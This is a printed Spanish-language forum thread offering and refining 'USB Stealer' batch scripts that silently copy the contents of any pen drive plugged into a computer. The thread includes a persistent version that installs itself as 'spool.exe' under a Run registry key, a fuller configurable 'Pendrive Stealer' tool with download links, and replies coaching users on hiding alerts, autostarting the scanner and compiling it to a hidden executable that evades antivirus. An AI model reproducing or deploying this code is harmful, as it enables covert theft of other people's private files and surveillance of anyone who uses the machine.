Imprimir Página - My USB Stealer

Título: My USB Stealer
Publicado por: corax en 1 Octubre 2008, 18:26 pm

Hola a todos!

Hoy os traigo la plantilla de un código en batch cuya función es copiar el contenido de memorias externas a una carpeta del disco duro de manera automática.

La plantilla es:

Código

::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura on-demand (hay que ejecutar el programa para que realice la orden).
:: Este sistema copia todos los archivos. Es posible adaptar el code para que copie solo archivos con un nombre y/o una extensión concreta.
 
@echo off
If Exist C:\STOLEN (goto echeck) else (
	MD C:\STOLEN
	goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Como podemos ver el código es bastante tosco. Esto es así porque está pensado para usarse como modelo de partida para otros códigos más específicos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que además queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del código anterior, con unas pequeñas modificaciones obtenemos un código como este:

Código

::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura always-on (una vez instalado, se ejecuta siempre).
:: El tipo de archivos que va a copiar son JPG y BMP. Esto es configurable.
 
@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
	MD "%USERPROFILE%\USB\"
	goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy E:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy F:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy G:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy H:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto echeck)

Aquí vemos que el programa se copiaría a la carpeta de Archivos de Programa, y crearía una clave en el registro que lo auto-iniciaría con windows, para evitar tener que andarlo ejecutando continuamente.
Además, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atención que C:\STOLEN, obviamente ::)

NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterísitca de ejecutarse en modo oculto.

Espero que este código os sea de utilidad a los que buscábais algo parecido (yo en su momento lo busqué), ya que así por lo menos no os arriesgáis a que el programa que os descargáis traiga "regalito". (Ventajas de conocer el código fuente :rolleyes:)

Hasta otra!

Título: Re: My USB Stealer
Publicado por: SmartGenius en 3 Octubre 2008, 05:25 am

Necesitas ayuda con codigos.....ya tengo la idea bastante desarrollada hace rato...y ya ahi una version funcional...programada con ayuda del compañero Rockox...

(http://img177.imageshack.us/img177/936/splashusbstealer2rr4.th.jpg)
(http://img379.imageshack.us/img379/9263/splashusbstealerig6.jpg)

Mira...lo puedes descargar aqui...

http://two.xthost.info/smartgenius/SourceCodeUSBStealerV1.01.zip
http://rapidshare.com/files/122880149/USBPendriveStealerv1.01.zip

El programa consta de dos codes...uno de configuracion y uno de escaneo...

USBStealer

Código:

@echo off
mode con cols=70
mode con lines=40
title Pendrive Stealer - Local
color 0a
REM Script de Copia de Dispositivos USB
REM Coded by :: SmartGenius :: , RockoX

if exist "myfolder.cfg" (goto anim) else (goto ins)

:ins
cls
echo.
echo  Instalando el Programa...
echo  Por favor espere
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
md "Mi Carpeta"
echo "Mi Carpeta\">"myfolder.cfg"
ping -n 2 0.0.0.0 > nul
pause
goto anim

:anim
cls
echo.
echo        ±±±±±                                               ±±±±±
echo      ±±°°°°°±                                            ±±°°°°°±
echo      ±°°°°°°°±±                                         ±°°°°°°°± 
echo    ±±°°°°°°°°°±                                        ±±°°°°°°°°±±
echo   ±°°°°°°°°°°°±                                      ±±°°°°°°°°°°°°±
echo   ±°°°°°°°°°°°°±±            ²²²²²²²²²²²²²²²²²²   ±±±°°°°°°°°°°°°°°±
echo    ±±°°°°°°°°°°°°±±±     ²²²²±±°°°°°°°°°°°°±±²²²²±°°°°°°°°°°°°±±±±±
echo      ±±±±±±°°°°°°°°°±²²²²°°°°°°°°°°°°°°°°°°°°°°²²²²°°°°°°±±±±±
echo            ±±±°°°°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±°°²²±±°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²±
echo                 ²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°±±²²
echo                ²²°°°°°°°°°°²²²²°°°°°°°°²²²²°°°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°²²²²²²²²°°°°²²²²²²²²°°°°°°°°°²²
echo                ²²°°°°°°°°°±²²²²°°°°°°°±²²²²°°°°°°°°°°°²²
echo                ²²±±°°°°°°°°°°°°°°±±±±°°°°°°°°°°°°°°°°²²
echo                 ²²²°°°°°°°°°°°°°°²²²²°°°°°°°°°°°°°°²²²²
echo                ±±²²²²°°°°°°°°°°°°°°°°°°°°°°°°°°°°²²²²°°±±
echo               ±±°°°°²²±°°°°°°°°°°°°°°°°°°°°°°°°°°²²°°°°°°±±
echo            ±±±°°°°°°°²²²²°°°°°°°°°°°°°°°°°°°°°²²²°°°°°°°°°°±±±±±±±
echo      ±±±±±±°°°°°°°°±±²  ²²²°°°°°°°°°°°°°°°°°°²²  ±±°°°°°°°°°°°°°°°±±
echo    ±±°°°°°°°°°°°°±±       ²°°°°°°°°°°°°°°°°°°²     ±±±±°°°°°°°°°°°°°±
echo    ±°°°°°°°°°°°±±         ²°°°°°°°°°°°°°°°°°°²         ±±°°°°°°°°°°±±
echo    ±±°°°°°°°°±±           ²°°±°°±°°±°°±°°±°°°²          ±°°°°°°°°±±
echo      ±±°°°°°±±            ²²²²²²²²²²²²²²²²²²²²          ±±°°°°°°±
echo        ±°°°±±                                             ±°°°°±
echo         ±±±±                                               ±±±±
echo.
echo              ²²² ²²² ²²  ²²²    ²² ²² ²²² ² ² ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ² ² ² ² ² ² ² ²   ²  ² ²
echo              ²   ² ² ² ² ²²² ²² ²   ² ²²² ²²  ²²² ²²²  ²²²
echo              ²   ² ² ² ² ²      ²   ² ² ² ² ² ²   ²  ²   ²
echo              ²²² ²²² ²²  ²²²    ²   ² ² ² ² ² ²²² ²  ² ²²²
echo.
pause
goto main

:main
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Definir carpeta principal...³  ³2³ ³ Tipos de Archivos..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Iniciar Escaneo de USBs...  ³  ³4³ ³ Ayuda del Programa.. ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Salir del Programa..        ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
set /p opc=">> "
if "opc"=="" (goto main)
set opc=%opc: =_%

if %opc%==1 goto dcp
if %opc%==2 goto ftype
if %opc%==3 goto scan
if %opc%==4 goto help
if %opc%==5 (goto out) else (goto err)

:err
cls
echo.
echo ERROR...
echo.
echo No ha escogido una Opcion Correcta
echo Vuelva a Intentarlo
echo.
pause
goto main

:dcp
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo   En esta opcion puede definir en donde se guardaran
echo   los archivos copiados...
echo.
echo  Arrastre aqui la carpeta
echo.
set /p dcp=">> "
if "dcp"=="" (goto dcp)
echo %dcp%>"myfolder.cfg"
echo.
echo  La carpeta : %dcp%
echo  se ha establecido exitosamente...
echo.
pause
goto main

:ftype
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo   Configure aqui los tipos de archivos que desea Escanear y Copiar
echo.
echo    Elija una Opcion:
echo.
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³1³ ³ Documentos...  ³  ³2³ ³ Imagenes ^& Fotos..       ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³3³ ³ Musica ^& Audio ³  ³4³ ³ Documentos ^& Imagenes..  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo   ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿  ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
echo   ³5³ ³ Videos *       ³  ³6³ ³ Todas las Opciones... *  ³
echo   ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo.
echo  * Las Opciones 5 y 6 pueden tardar mas de lo normal...
echo.
set /p typ=">> "
if "typ"=="" (goto ftype)
if %typ%==1 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb>"ftypes.cfg" & goto yap)
if %typ%==2 (echo *.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==3 (echo *.mp3,*.mp4,*.wav,*.mid,*.wma,*.ogg>"ftypes.cfg" & goto yap)
if %typ%==4 (echo *.txt,*.doc,*.pdf,*.ppt,*.pps,*.xls,*.htm,*.rtf,*.mdb,*.jpg,*.gif,*.bmp,*.png,*.psd,*.jpeg,*.tiff>"ftypes.cfg" & goto yap)
if %typ%==5 (echo *.mpg,*.wmv,*.asf,*.3gp,*.avi,*.mov>"ftypes.cfg" & goto yap)
if %typ%==6 (echo *.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.mp4,*.wma>"ftypes.cfg" & goto yap)
goto main

:yap
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
echo.
echo  Tipos de Archivos Configurados correctamente
echo.
echo  Archivos con Extension: %filetypes%
echo.
pause
goto main

:scan
start USBScan.bat
exit

:help
cls
echo.
echo.
echo                ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo                º Pendrive Stealer v 1.0  xD º
echo                ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
echo  Este programa tiene la Funcion de copiar archvos desde dispositivos
echo  USB, de manera silenciosa y sin levantar sospechas...
echo.
echo  El programa puede ser congifurado facilmente, dandole opciones de 
echo  escoger que tipos de archivos copiar y en que carpeta se deben
echo  guardar...
echo.
echo.
echo  Titulo:  Pendrive USB Stealer, Version 1.0 Local
echo  Autores: :: SmartGenius ::, RockoX
echo  Web:     http://foro.code-makers.es
echo.
echo  SmartGenius, Corp. 2008
echo.
pause
goto main
  
:out
cls
echo MsgBox "Gracias por usar este Programa", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

USBScan

Código:

@echo off
title USB Stealer - Local
color 0a

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

:ini
if not exist "myfolder.cfg" (goto fixfolder)
for /F "tokens=*" %%a in (myfolder.cfg) do set myfolder=%%a
if not exist "ftypes.cfg" (gotp fixfiles)
for /F "tokens=*" %%b in (ftypes.cfg) do set filetypes=%%b
goto main

:main
for %%u in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do call :comp %%u
goto ini

:comp
set unidad=%1
FSUTIL FSINFO DRIVETYPE %unidad%:>%temp%\letuni.tmf
if %errorlevel%==1 (goto usb2)
for /F "tokens=*" %%e in (%temp%\letuni.tmf) do set let=%%e
if %let:~-4%==ble (call :usb %unidad%)
if %let:~-4%==ija (goto :eof)
if %let:~-4%==ROM (goto :eof)

:usb
set letra=%1
if exist "%letra%:\db.ini" goto :eof
for  /r %letra%: %%t in (%filetypes%) do (copy "%%t" %myfolder%)
echo USB>db.ini
goto :eof

:usb2
for %%n in ( D E F G H I J K L M N O P Q R S T U V W X Y Z) do (call :usb %%n)
goto ini

:fixfiles
echo *.jpg,*.gif,*.png,*.bmp,*.txt,*.doc,*.pdf,*.ppt,*.xls,*.htm>"ftypes.cfg"
echo MsgBox "Los Tipos de Archivo no estan configurados...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

:fixfolder
echo "Mi Carpeta\">"myfolder.cfg"
echo MsgBox "No Hay una Carpeta Predefinida...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
exit

Saludos.

Título: Re: My USB Stealer
Publicado por: corax en 3 Octubre 2008, 13:03 pm

No está mal, no está mal, es muy bueno el code que sugieres... ;D la idea general que yo proponía es que fuera simple, lo básico, cuatro cosas y ya está, e ir configurándolo según las necesidades cambiando el código fuente... vosotros lo que habéis hecho es currároslo un montón.

Gracias por el aporte, voy a probar vuestro código cuando tenga un momento. :P

Un saludo ;)

Título: Re: My USB Stealer
Publicado por: estudcom en 23 Octubre 2008, 12:50 pm

Hola corex
me encanta lo que has creado pero necesito tu ayuda. He creado un post aquí exponiendo mi caso:
http://foro.elhacker.net/hacking_basico/usb_copiador_o_algo_asi_ayuda-t231480.0.html

En cualquier caso te explico. Lo que quiero es un programa muy sencillo que copie la información de un pen drive (word, pdf, pps,) en una carpeta del ordenador. Tu codigo por lo que veo hace exactamente eso pero en mi caso tengo un problema y es que necesito que el codigo se autoejecute él sólo con windows (al iniciar windows) y se mantenga activo todo el tiempo, es decir, que cada vez que alguien inicie sesion y meta un pen drive automaticamente y en silencio se copie todo el contenido en una carpeta y si en la misma sesion otra persona mete otro pen drive también copie su contenido (y bueno que si alguien cierra la sesion y otro abre una nueva y mete su pen drive se copie tambien todo). Sólo que todo esto lo tiene que hacer sin necesidad de que yo lo active o ejecute (tiene que ser completamente automático).

Si vas al post donde explique mi situación veras que averno me ha ayudado mucho pero que la mayoría de las soluciones que me ha dado han tenido sus inconvenientes y en general que yo no se mucho de informatica ni de programar ni nada.
Muchisimas gracias con lo que me puedas ayudar y espero impaciente tu ayuda.

Título: Re: My USB Stealer
Publicado por: SmartGenius en 24 Octubre 2008, 04:01 am

El code que he posteado arriba esta mejor trabajado...tra ya las opcines listas, solo es cuestin de ejecutarlo y ponerlo a escanear..se hace de manera oculta, para lo toro que quieres lo que debes hacer es agregar el scanner al inicio de windows y el solo estara todo el tiempo haciendo su trabajo...

El code expuesto es libre de ser modificado, pero manteniendo los autores originales....yo en lo personal me he encargado de hacerle una nueva interfaz y de mejorar el scanner para hacerlo mas efectivo....

(http://img236.imageshack.us/img236/2261/splashmf4.png)

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Con la Interfaz programas las opciones y luego haces que el scanner se ejecute con cada inicio de WINDOWS....

Saludos.

Título: Re: My USB Stealer
Publicado por: corax en 24 Octubre 2008, 10:11 am

Fascinante... un trabajo realmente fino.

Enhorabuena. ::)

Título: Re: My USB Stealer
Publicado por: estudcom en 28 Octubre 2008, 17:53 pm

oye smart genius muchisimas gracias. es justo lo que necesitaba!!. Bueno ya había erdido toda esperanza sobretodo porque no se xq razon ya no puedo acceder al post que cree para conseguir lo que tu me has servido en bandeja.
Esta genial. Lo unico que sólo voy ha usar el ejecutable USBScan que por lo que he visto simplemente al ejecutarlo copia todos los pdf word pps incluso excel a la carpeta donde lo pongo (y voy ha hacer lo del acceso directo en la carpeta inicio).
En realidad el otro archivo USBStealer es mucho mejor pero lo malo es que cuando le das a ocultar deja un simbolito abajo a la derecha.
En fin con el USBScan me basta muchas gracias!!!! eres el mejor

Título: Re: My USB Stealer
Publicado por: estudcom en 29 Octubre 2008, 17:34 pm

smart genius tengo un problemilla que no logro entender. hasta ahora todo funcionaba bien pero hoy pasa lo siguiente. Para empezar en la carpeta donde indico que se deben copiar los documentos del pen copia unos archivos muy raros (que no estan en el pen) en plan e-books en ingles y cosas así. No se si puede que recupere información ya borrada del pen (no lo entiendo pero es una posibilidad no?) o si esta copiando archivos de otra carpeta del ordenador. En cualquier caso ha dejado de copiar el contenido del pen. Tiene que ver con algo de la unidad? (a veces la unidad es E y otras F). Yo para instalarlo hice lo siguiente:
-Descomprimi.
-Puse todo en una carpeta.
-Ejecute el archivo USBStealer y lo configure (le indique la carpeta donde copiar y elegi documentos). Le di a iniciar para comprobar y todo bien.
-Cerre USBStealer y cree un acceso directo del archivo USBScan el cual introduje en la carpeta de inicio para que se inicie con windows.

Y ya esta. He cometido algun error? no debería iniciarse con windows el usb scan y copiarlo todo sin que se vea que lo hace?.
Gracias

Título: Re: My USB Stealer
Publicado por: SmartGenius en 29 Octubre 2008, 21:45 pm

Bueno...en el paquete vienen dos archivos que son el USBSTealer que no es mas que una interfaz grafica en vb.net...hecha como mejora de la que habia anteriormente que esta en este post mas arriba, y el otro archivo es el USBScan que es casi el mismo codigo que hay arriba...solo modifique la forma de detectarmlas unidades extraibles...y cuando una unidad ya es analizada deja en ella un archivo llamado DB.INI para que o vuelva a copiar de la misma USB...eso fue solo de pruebas...puedes usar el codigo que esta posteado mas arriba, lo pasa a EXE y de seguro tamben funcionara...y claro que debria arrancar con windows...tanto desde la carpeta Inicio com que lo agregues al registro...

La interfaz se hizo de esa manera como para mantener informado al user, hacerla ams amigable y por eso la opcion de ocultarse en el Tray...pero puedes cerrar la aplicacion y aun seguora escaneando a menos que le des en detener...

si tienes mas dudas solo me avisas OK.

Saludos.

Título: Re: My USB Stealer
Publicado por: argon2002 en 31 Octubre 2008, 15:43 pm

Hola SmartGenius, he seguido vuestro hilo porque a mi también me interesa la aplicación que has desarrollado. He seguido todos los pasos que has comentado, he descargado el programa y su interfaz gráfica y he añadido el programa al inicio de Windows XP mediante el registro de Windows. Todo funciona perfectamente, el único problema es que cuando arranco el sistema, aparece una ventana del USBStealer que dice algo así como : "Ha comenzado el escaneo" . Me gustaría que esa ventana no apareciera, que el USBStealer se ejecutara al inicio de Windows, pero que no apareciera ningún mensaje que indicara que está funcionando. No se si tienes idea de como hacerlo, imagino que una pequeña modificación del código del programa podría valer, o a lo mejor tu conoces alguna solución más simple. Un saludo y gracias

Título: Re: My USB Stealer
Publicado por: SmartGenius en 31 Octubre 2008, 23:07 pm

Muy seguramente estan haciendo uso dle codigo que esta mas arriba....y ese tiene una linea de codigo que muestra ese aviso... y pues es para eso..para que avise...

Código:

:load
cls
echo MsgBox "Se inicio el Escaneo...", 64, "USB Stealer" >%temp%\msgr.vbs
start %temp%\msgr.vbs
goto ini

aunque deberian usar la que postee mas abajo en el cual ya quite esa funcion...simplemente empieza a escanear con base en los dos archivos previamente configurados por la interfaz...y todo lo hace da manera silenciosa....

http://rapidshare.com/files/154932419/USBStealerbySmart.rar

Saludos.

Título: Re: My USB Stealer
Publicado por: estudcom en 18 Noviembre 2008, 20:17 pm

oye no me funciona. Podrias hacerme el favorazo enrome de hacer un programita sencillo que solo copie documentos de Power Point y word de forma oculta y automaticamente. y nisiquiera tiene que ser configurable con que lo copie n la misma carpeta donde ponga el programa bastaria. gracias

Título: Re: My USB Stealer
Publicado por: corax en 19 Noviembre 2008, 14:31 pm

Si lees los códigos que hice yo al principio del post verás que justamente lo que explican es cómo hacértelo tú mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional.

Intenta hacerlo tú, y si tienes algún problema con los códigos en batch o al compilar me comentas ;)

Título: Re: My USB Stealer
Publicado por: estudcom en 19 Noviembre 2008, 16:57 pm

corax me acabas de arrojar mucha luz. a veces estamos tan cerca de un problema que perdemos la perspectiva y no podemos ver las opciones. Lo que quiero decir es que voy ha ahcer lo que me has dicho pero tengo algunas dudas (sobretodo porque no se mucho de informática). Sólo quiero que me digas que es lo que tengo que cambiar para que se inicie con windows y copie todo tipo de archivos en la carpeta c:/z434733/eviews/
Me encantaría que me postearas el code modificado para lo que te pido pero por intentarlo te pongo el code como yo lo he modificado (en realidad he mezclado un poco de los dos codigos de arriva para que se inice automaticamente y para que copie todo tipo de archivos), mi mayor problema es que no se que tengo que hacer con el code: ¿lo guardo en un txt con alguna extensión especifica? ¿como se hace eso? y mi ortro problema es que no se que tengo que cambiar para que copie todo en la ruta c:/z434733/eviews/
Gracias por tu ayuda de verdad

Código:

@echo off
 
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
 
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
 
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
	MD "%USERPROFILE%\USB\"
	goto echeck
)
 
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
 
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
 
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
 
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
 
 
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
 
 
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
 
 
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
 
 
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)

Una ultima cosa he estado probando por cuariosidad (aunque sin saber lo que hago realmente) y he guardado el documento de bloc de notas con la extensión .bat y no se porque no se ha creado ningun .bat, es decir, sigue siendo un archivo de bloc de notas. he probado ha cambiar la extensión a .ini y tampoco sirve. Es como si no pudiera cambiar la extensión de los archivos del bloc de notas. A mi me suena que antes podía ¿que ha podido pasar? habre cambiado algo de la configuración del ordenador sin querer?. Lo digo porque sino puedo crear la extensión que requiera este programa quizas podrias mandarme un alrchivo con esa extensión. En fin estoy aquí a la expectartiva e impaciente. Gracias y un saludo

Título: Re: My USB Stealer
Publicado por: corax en 19 Noviembre 2008, 22:34 pm

Hola estudcom,

Hay un par de cosas del code que debes cambiar:

Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del código:

Código original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraíble, es decir, E, F, G, H y las que tú le quieras meter si creas más redirecciones)

Códig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I

Es decir, en la segunda ruta especificas la dirección a la que se va a copiar.
(NOTA: Veo que has puesto la dirección de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])

Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizá no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas símplemente "Prueba"). ¿Qué pasa en ese caso? Que al ponerle extensión .bat realmente no le estás dando una nueva extensión, ya que las tienes ocultas, sino que al archivo "prueba" le estás dando el nuevo nombre de "prueba.bat", siendo la extensión de ambos la de .txt

Resumiendo, no le estás cambiando realmente la extensión al archivo, sino que estás haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pestaña "herramientas" en cualquier carpeta, de ahí a la opción "opciones de carpeta", y una vez ahí selecciona la pestaña "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmárcala si está marcada.

De todas maneras este código no está pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.

Si te fijas, en las primeras líneas de código está la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
¿Qué significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensión .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.

Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las últmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que también sale.

Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en último término spool.exe) debes cambiar el nombre en la rama de:

copy /y %0 "%PROGRAMFILES%\USB\spool.exe"

y en la de:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f

De la misma manera, si quieres copiarlo a otra carpeta, sólo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas líneas.

Título: Re: My USB Stealer
Publicado por: estudcom en 20 Noviembre 2008, 16:12 pm

